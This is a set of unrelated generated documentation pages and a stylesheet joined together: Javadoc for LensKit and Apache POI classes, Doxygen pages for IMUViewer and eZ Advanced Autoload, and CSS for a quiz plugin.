<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li><a href="#nested.classes.inherited.from.class.org.grouplens.lenskit.eval.traintest.CachingDAOProvider">Nested</a> | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
doc/html/class_tests-members.html | mohamedamjad/IMUViewer | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>IMUViewer: Member List</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">IMUViewer
</div>
<div id="projectbrief">Visualisation de données inertielles</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.1.2 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Variables</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">Tests Member List</div> </div>
</div><!--header-->
<div class="contents">
<p>This is the complete list of members for <a class="el" href="class_tests.html">Tests</a>, including all inherited members.</p>
<table class="directory">
<tr bgcolor="#f0f0f0"class="even"><td class="entry"><b>TdSPasseBas</b>() (defined in <a class="el" href="class_tests.html">Tests</a>)</td><td class="entry"><a class="el" href="class_tests.html">Tests</a></td><td class="entry"><span class="mlabel">static</span></td></tr>
<tr bgcolor="#f0f0f0"><td class="entry"><b>TdSReechantilonnage</b>() (defined in <a class="el" href="class_tests.html">Tests</a>)</td><td class="entry"><a class="el" href="class_tests.html">Tests</a></td><td class="entry"><span class="mlabel">static</span></td></tr>
<tr bgcolor="#f0f0f0"class="even"><td class="entry"><b>testItegration</b>() (defined in <a class="el" href="class_tests.html">Tests</a>)</td><td class="entry"><a class="el" href="class_tests.html">Tests</a></td><td class="entry"><span class="mlabel">static</span></td></tr>
<tr bgcolor="#f0f0f0"><td class="entry"><b>testQuaternion</b>() (defined in <a class="el" href="class_tests.html">Tests</a>)</td><td class="entry"><a class="el" href="class_tests.html">Tests</a></td><td class="entry"><span class="mlabel">static</span></td></tr>
<tr bgcolor="#f0f0f0"class="even"><td class="entry"><b>Tests</b>() (defined in <a class="el" href="class_tests.html">Tests</a>)</td><td class="entry"><a class="el" href="class_tests.html">Tests</a></td><td class="entry"></td></tr>
<tr bgcolor="#f0f0f0"><td class="entry"><b>tout</b>() (defined in <a class="el" href="class_tests.html">Tests</a>)</td><td class="entry"><a class="el" href="class_tests.html">Tests</a></td><td class="entry"><span class="mlabel">static</span></td></tr>
</table></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Wed Dec 3 2014 15:25:02 for IMUViewer by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.1.2
</small></address>
</body>
</html>
|
templates/qmn_primary.css | AssemblyDev3/quiz-dev | .ui-tooltip {
max-width: 500px !important;
}
.ui-tooltip-content {
max-width: 500px !important;
}
.mlw_qmn_hint_link {
text-decoration:underline;
color:rgb(0,0,255);
}
@-moz-keyframes spinner-loader {
0% {
-moz-transform: rotate(0deg);
transform: rotate(0deg);
}
100% {
-moz-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@-webkit-keyframes spinner-loader {
0% {
-webkit-transform: rotate(0deg);
transform: rotate(0deg);
}
100% {
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@keyframes spinner-loader {
0% {
-moz-transform: rotate(0deg);
-ms-transform: rotate(0deg);
-webkit-transform: rotate(0deg);
transform: rotate(0deg);
}
100% {
-moz-transform: rotate(360deg);
-ms-transform: rotate(360deg);
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
/* :not(:required) hides this rule from IE9 and below */
.qsm-spinner-loader:not(:required) {
-moz-animation: spinner-loader 1500ms infinite linear;
-webkit-animation: spinner-loader 1500ms infinite linear;
animation: spinner-loader 1500ms infinite linear;
-moz-border-radius: 0.5em;
-webkit-border-radius: 0.5em;
border-radius: 0.5em;
-moz-box-shadow: rgba(0, 0, 51, 0.3) 1.5em 0 0 0, rgba(0, 0, 51, 0.3) 1.1em 1.1em 0 0, rgba(0, 0, 51, 0.3) 0 1.5em 0 0, rgba(0, 0, 51, 0.3) -1.1em 1.1em 0 0, rgba(0, 0, 51, 0.3) -1.5em 0 0 0, rgba(0, 0, 51, 0.3) -1.1em -1.1em 0 0, rgba(0, 0, 51, 0.3) 0 -1.5em 0 0, rgba(0, 0, 51, 0.3) 1.1em -1.1em 0 0;
-webkit-box-shadow: rgba(0, 0, 51, 0.3) 1.5em 0 0 0, rgba(0, 0, 51, 0.3) 1.1em 1.1em 0 0, rgba(0, 0, 51, 0.3) 0 1.5em 0 0, rgba(0, 0, 51, 0.3) -1.1em 1.1em 0 0, rgba(0, 0, 51, 0.3) -1.5em 0 0 0, rgba(0, 0, 51, 0.3) -1.1em -1.1em 0 0, rgba(0, 0, 51, 0.3) 0 -1.5em 0 0, rgba(0, 0, 51, 0.3) 1.1em -1.1em 0 0;
box-shadow: rgba(0, 0, 51, 0.3) 1.5em 0 0 0, rgba(0, 0, 51, 0.3) 1.1em 1.1em 0 0, rgba(0, 0, 51, 0.3) 0 1.5em 0 0, rgba(0, 0, 51, 0.3) -1.1em 1.1em 0 0, rgba(0, 0, 51, 0.3) -1.5em 0 0 0, rgba(0, 0, 51, 0.3) -1.1em -1.1em 0 0, rgba(0, 0, 51, 0.3) 0 -1.5em 0 0, rgba(0, 0, 51, 0.3) 1.1em -1.1em 0 0;
display: inline-block;
font-size: 10px;
width: 1em;
height: 1em;
margin: 1.5em;
overflow: hidden;
text-indent: 100%;
}
.mlw_qmn_message_before {
color: #666;
font-size: 18px;
display: block;
margin-bottom: 20px;
padding-bottom: 10px;
border-bottom: 1px solid #f3f3f3;
}
.mlw_qmn_message_before p { margin: 0 0 10px 0; }
.quiz_section {
display: block;
border: 0;
margin: 0;
padding: 15px 0 0;
font-size: 16px;
}
.quiz_section.border {
border-top: 1px solid #f3f3f3;
}
.quiz_section label,
.quiz_section .mlw_qmn_question {
display: block;
margin: 0 0 5px 0;
font-weight: bold;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
label.inline,
label.inline .mlw_qmn_question,
.quiz_section.inline .mlw_horizontal_multiple {
display: inline-block;
}
.quiz_section p.form-help {
margin: 5px 0 0 0;
font-size: 12px;
color: #999;
}
.quiz_section iframe { margin-bottom: 10px; }
.qmn_mc_answer_wrap {
display: block;
margin: 5px 0 5px 0;
}
.quiz_section .qmn_radio_answers label,
.quiz_section .qmn_check_answers label,
.quiz_section .qmn_accept_answers label {
display: inline;
margin: 0 10px 0 5px;
font-weight: normal;
font-size: 14px;
cursor: pointer;
}
.quiz_section.text-block h2 {
display: block;
margin: 0 0 10px 0;
}
.quiz_section select,
.quiz_section textarea,
.quiz_section input[type="text"],
.quiz_section input[type="email"],
.quiz_section input[type="number"] {
width: 70%;
min-height: 35px;
display: inline-block;
padding: 10px 8px 10px 8px;
font-size: 14px;
color: #555;
background: #fff;
border: 1px solid #e3e3e3;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
-webkit-transition: all .5s ease-in-out;
-moz-transition: all .5s ease-in-out;
transition: all .5s ease-in-out;
}
.quiz_section select { height: 38px; }
.quiz_section select:hover,
.quiz_section textarea:hover,
.quiz_section input[type="text"]:hover,
.quiz_section input[type="email"]:hover,
.quiz_section input[type="number"]:hover,
.quiz_section select:focus,
.quiz_section textarea:focus,
.quiz_section input[type="text"]:focus,
.quiz_section input[type="email"]:focus,
.quiz_section input[type="number"]:focus {
outline: 0;
background: #f7f7f7;
border: 1px solid #bdc3c7;
-webkit-box-shadow: 0 0 10px rgba(0,0,0,0.15);
-moz-box-shadow: 0 0 10px rgba(0,0,0,0.15);
box-shadow: 0 0 10px rgba(0,0,0,0.15);
}
.mlw_qmn_question {
/*padding-bottom: 18px;*/
padding-top: 10px;
}
.current label {
background-color: #fff !important;
color: #0A2341 !important;
}
.current2 label {
background-color: #fff !important;
color: #0A2341 !important;
}
.qmn_btn.mlw_qmn_quiz_link.mlw_previous {
float: left;
}
.quiz_end {
color: #fff;
margin-bottom: 0px;
padding: 15px 15px 0 15px!important;
position: relative;
text-align:left !important;
}
.qmn_btn {
float: right;
}
.qmn_fill_blank {
margin: 0 5px 0 5px;
width: 100px !important;
}
.qmn_fill_blank.small { width: 50px; }
.qmn_fill_blank.medium { width: 100px; }
.qmn_fill_blank.large { width: 150px; }
/* Alerts and error state */
.qmn_error_message {
color: #da4f49;
border: 1px solid #da4f49;
background: #F2DEDE;
display: block;
padding: 10px;
margin-bottom:24px;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
}
.quiz_section.qmn_error select,
.quiz_section.qmn_error textarea,
.quiz_section.qmn_error input[type="text"],
.quiz_section.qmn_error input[type="number"],
.quiz_section.qmn_error input[type="email"],
.quiz_section.qmn_error select:hover,
.quiz_section.qmn_error textarea:hover,
.quiz_section.qmn_error input[type="text"]:hover,
.quiz_section.qmn_error input[type="number"]:hover,
.quiz_section.qmn_error input[type="email"]:hover,
.quiz_section.qmn_error select:focus,
.quiz_section.qmn_error textarea:focus,
.quiz_section.qmn_error input[type="text"]:focus,
.quiz_section.qmn_error input[type="number"]:focus,
.quiz_section.qmn_error input[type="email"]:focus {
position: relative;
border: 1px solid #da4f49;
background: #F2DEDE;
-webkit-box-shadow: 0 0 10px rgba(218, 79, 73, .35);
-moz-box-shadow: 0 0 10px rgba(218, 79, 73, .35);
box-shadow: 0 0 10px rgba(218, 79, 73, .35);
}
.quiz_section.qmn_error { position: relative; }
.quiz_section.qmn_error:after {
content: '-';
color: #fff;
font-size: 20px;
font-family: 'Helvetica', Arial, sans-serif;
background: #da4f49;
text-align: center;
display: inline-block;
height: 20px;
line-height: 20px;
width: 20px;
position: absolute;
right: 15px;
top: 12px;
-webkit-border-radius: 20px;
-moz-border-radius: 20px;
border-radius: 20px;
}
.quiz_section.qmn_error .qmn_radio_answers,
.quiz_section.qmn_error .qmn_check_answers,
.quiz_section.qmn_error .qmn_accept_answers {
border: 1px solid #da4f49;
background: #F2DEDE;
padding: 5px;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
}
.qmn_btn, .qmn_quiz_container .btn {
display: relative;
display: inline-block;
color: #666 !important;
background: #ccc !important;
font-size: 16px !important;
padding: 10px 20px 10px 20px !important;
text-decoration: none !important;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
-webkit-box-shadow: 0px 0px 6px rgba(0,0,0,.05);
-moz-box-shadow: 0px 0px 6px rgba(0,0,0,.05);
box-shadow: 0px 0px 6px rgba(0,0,0,.05);
-webkit-transition: background .25s ease-out;
-moz-transition: background .25s ease-out;
transition: background .25s ease-out;
}
.qmn_btn:hover, .qmn_quiz_container .btn:hover {
color: #fff;
background: #666;
}
/*.qmn_pagination {
position: relative;
display: block;
padding: 15px 0 15px 0;
border-top: 1px solid #f3f3f3;
}*/
.qmn_pagination {
border: none;
display: block;
padding: 0;
position: relative;
}
.mlw_previous,
.mlw_next {
position: absolute;
top: 3px;
font-size: 14px;
text-transform: uppercase;
}
.mlw_previous {
left: 3px;
position: absolute;
}
.mlw_next { right: 3px; position: absolute; display: none !important;}
.qmn_page_counter_message {
font-size: 14px;
color: #999;
width: 100px;
padding: 10px 20px 10px 20px;
margin: 0 auto;
text-align: center;
}
.mlw_qmn_timer {
z-index: 999;
display: inline-block;
position: fixed;
bottom: 20px;
right: 20px;
height: 50px;
line-height: 50px;
padding: 0 20px;
background: #34495e;
color: #fff;
-webkit-border-radius: 50px;
-moz-border-radius: 50px;
border-radius: 50px;
-webkit-box-shadow: 0 4px 8px rgba(0,0,0,.10);
-moz-box-shadow: 0 4px 8px rgba(0,0,0,.10);
box-shadow: 0 4px 8px rgba(0,0,0,.10);
}
.qmn_quiz_container select,
.qmn_quiz_container textarea,
.qmn_quiz_container input[type="text"],
.qmn_quiz_container input[type="email"],
.qmn_quiz_container input[type="number"] {
background: #fff;
border: 1px solid #3498db;
}
.qmn_quiz_container select:hover,
.qmn_quiz_container textarea:hover,
.qmn_quiz_container input[type="text"]:hover,
.qmn_quiz_container input[type="email"]:hover,
.qmn_quiz_container input[type="number"]:hover,
.qmn_quiz_container select:focus,
.qmn_quiz_container textarea:focus,
.qmn_quiz_container input[type="text"]:focus,
.qmn_quiz_container input[type="email"]:focus,
.qmn_quiz_container input[type="number"]:focus{
outline: 0;
background: #fff;
border: 1px solid #3498db;
-webkit-box-shadow: 0 0 10px rgba(52, 152, 219, .35);
-moz-box-shadow: 0 0 10px rgba(52, 152, 219, .35);
box-shadow: 0 0 10px rgba(52, 152, 219, .35);
}
.qmn_quiz_container .qmn_btn {
color: #fff !important;
background: #3498db !important;
}
.qmn_quiz_container .qmn_btn:hover { background: #2980b9 !important; }
.qmn_quiz_container .qmn_btn.mlw_previous {
background: none!important;
}
.qmn_quiz_container .qmn_btn.mlw_previous:hover { background: none!important; }
/* Helper classes */
.border-none { border: 0; }
.margin-bottom { margin-bottom: 20px; }
@media( max-width: 480px){
.quiz_end input.qmn_btn {
bottom: -42px!important;
}
}
@media (max-width: 768px) {
.quiz_section label,
.quiz_section .mlw_qmn_question {
font-size: 18px;
}
.quiz_section .qmn_radio_answers .qmn_mc_answer_wrap label {
font-size: 18px;
}
.quiz_section p.form-help { font-size: 14px; }
.quiz_section select,
.quiz_section textarea,
.quiz_section input[type="text"] {
display: block;
width: 100%;
padding: 12px 10px 12px 10px;
font-size: 16px;
}
.mlw_previous,
.mlw_next,
.qmn_page_counter_message {
display: inline-block;
/*max-width: 100px;*/
text-align: center;
position: relative;
top: 0;
left: 0;
right: 0;
}
.mlw_qmn_timer { top: 20px; }
}
.slide1 {
color: #fff;
padding: 80px 0 0;
text-align: center;
}
.slide2 {
color: #fff;
text-align: center;
padding: 80px 0 0;
}
.slide3 {
color: #fff;
text-align: center;
padding: 80px 0 0;
}
.slide4 {
color: #fff;
text-align: center;
padding: 80px 0 0;
}
.slide5 {
color: #fff;
text-align: center;
padding: 80px 0 0;
}
.slide6 {
color: #fff;
text-align: center;
padding: 80px 0 0;
}
.slide7 {
color: #fff;
text-align: center;
padding: 80px 0 0;
}
.slide8 {
color: #fff;
text-align: center;
padding: 80px 0 0;
}
.slide9 {
color: #fff;
text-align: center;
padding: 80px 0 0;
}
.qmn_mc_answer_wrap {
display: inline-block;
}
.qmn_quiz_radio {
display: none;
}
.qmn_radio_answers label {
background-color: #93c0ea;
color: #002347;
float: right;
font-weight: bold;
padding: 8px 61px;
}
.qmn_mc_answer_wrap label {
background-color: #93c0ea;
color: #002347;
float: left;
font-weight: bold;
padding: 8px 61px;
}
.quiz_end input.qmn_btn {
background: #112641 none repeat scroll 0 0 !important;
border: medium none !important;
bottom: -60px;
position: absolute;
right: 15px;
z-index: 99;
}
/*.quiz_end input.qmn_btn:active{ top: auto; bottom: -64px; }*/
.quiz_end input[type="text"] {
margin-bottom: 14px;
width: 100% !important;
}
.qmn_quiz_container.mlw_qmn_quiz {
padding-bottom: 40px;
background-color:#112641;
}
.hide{
display: none !important;
}
.qmn_results_page {
color: #fff;
padding: 15px 0 0 15px;
font-weight: bold;
text-align: center;
}
.qsm-spinner-loader{
box-shadow: rgba(255, 255, 255, 0.8) 1.5em 0 0 0,
rgba(255, 255, 255, 0.8) 1.1em 1.1em 0 0,
rgba(255, 255, 255, 0.8) 0 1.5em 0 0,
rgba(255, 255, 255, 0.8) -1.1em 1.1em 0 0,
rgba(255, 255, 255, 0.8) -1.5em 0 0 0,
rgba(255, 255, 255, 0.8) -1.1em -1.1em 0 0,
rgba(255, 255, 255, 0.8) 0 -1.5em 0 0,
rgba(255, 255, 255, 0.8) 1.1em -1.1em 0 0!important;
margin: 25px 50% 0!important;
}
.qmn_quiz_container .logo_pag {
float: left;
width: 120px;
}
|
doc/doxygen/html/autoload_8ini_8append_8php_source.html | donaldinou/ezadvancedautoload | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>eZ Advanced Autoload: C:/Users/aloyant/ezadvancedautoload/settings/autoload.ini.append.php Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
<link href="navtree.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="resize.js"></script>
<script type="text/javascript" src="navtree.js"></script>
<script type="text/javascript">
$(document).ready(initResizable);
</script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
</head>
<body>
<div id="top"><!-- do not remove this div! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectlogo"><img alt="Logo" src="C:\Users\aloyant\Downloads\Logo-TE80x80.png"/></td>
<td style="padding-left: 0.5em;">
<div id="projectname">eZ Advanced Autoload
 <span id="projectnumber">1.0.0-RC</span>
</div>
<div id="projectbrief">Autoload-management-for-eZPublish</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- Generated by Doxygen 1.8.0 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li><a href="annotated.html"><span>Data Structures</span></a></li>
<li class="current"><a href="files.html"><span>Files</span></a></li>
<li><a href="examples.html"><span>Examples</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>Globals</span></a></li>
</ul>
</div>
</div>
<div id="side-nav" class="ui-resizable side-nav-resizable">
<div id="nav-tree">
<div id="nav-tree-contents">
</div>
</div>
<div id="splitbar" style="-moz-user-select:none;"
class="ui-resizable-handle">
</div>
</div>
<script type="text/javascript">
initNavTree('autoload_8ini_8append_8php.html','');
</script>
<div id="doc-content">
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Data Structures</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Namespaces</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Variables</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div class="header">
<div class="headertitle">
<div class="title">C:/Users/aloyant/ezadvancedautoload/settings/autoload.ini.append.php</div> </div>
</div><!--header-->
<div class="contents">
<a href="autoload_8ini_8append_8php.html">Go to the documentation of this file.</a><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <?php <span class="comment">/* #?ini charset="utf-8"?</span>
<a name="l00002"></a>00002 <span class="comment"></span>
<a name="l00003"></a>00003 <span class="comment">[Settings]</span>
<a name="l00004"></a>00004 <span class="comment">FinerFilterAutoload=enabled</span>
<a name="l00005"></a>00005 <span class="comment"></span>
<a name="l00006"></a>00006 <span class="comment">*/</span> ?>
</pre></div></div><!-- contents -->
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="autoload_8ini_8append_8php.html">autoload.ini.append.php</a> </li>
<li class="footer">Generated on Fri Mar 9 2012 17:09:54 for eZ Advanced Autoload by
<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.0 </li>
</ul>
</div>
</body>
</html>
|
lib/docs/apidocs/org/apache/poi/hwpf/model/UPX.html | setu9760/Jade_project_repo | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="ru">
<head>
<title>UPX (POI API Documentation)</title>
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="UPX (POI API Documentation)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/UPX.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../org/apache/poi/hwpf/model/UnhandledDataStructure.html" title="class in org.apache.poi.hwpf.model"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../../org/apache/poi/hwpf/model/Xst.html" title="class in org.apache.poi.hwpf.model"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/poi/hwpf/model/UPX.html" target="_top">Frames</a></li>
<li><a href="UPX.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">org.apache.poi.hwpf.model</div>
<h2 title="Class UPX" class="title">Class UPX</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>org.apache.poi.hwpf.model.UPX</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre><a href="../../../../../org/apache/poi/util/Internal.html" title="annotation in org.apache.poi.util">@Internal</a>
public final class <span class="strong">UPX</span>
extends java.lang.Object</pre>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><strong><a href="../../../../../org/apache/poi/hwpf/model/UPX.html#UPX(byte[])">UPX</a></strong>(byte[] upx)</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span>Methods</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hwpf/model/UPX.html#equals(java.lang.Object)">equals</a></strong>(java.lang.Object o)</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>byte[]</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hwpf/model/UPX.html#getUPX()">getUPX</a></strong>()</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>int</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hwpf/model/UPX.html#size()">size</a></strong>()</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>java.lang.String</code></td>
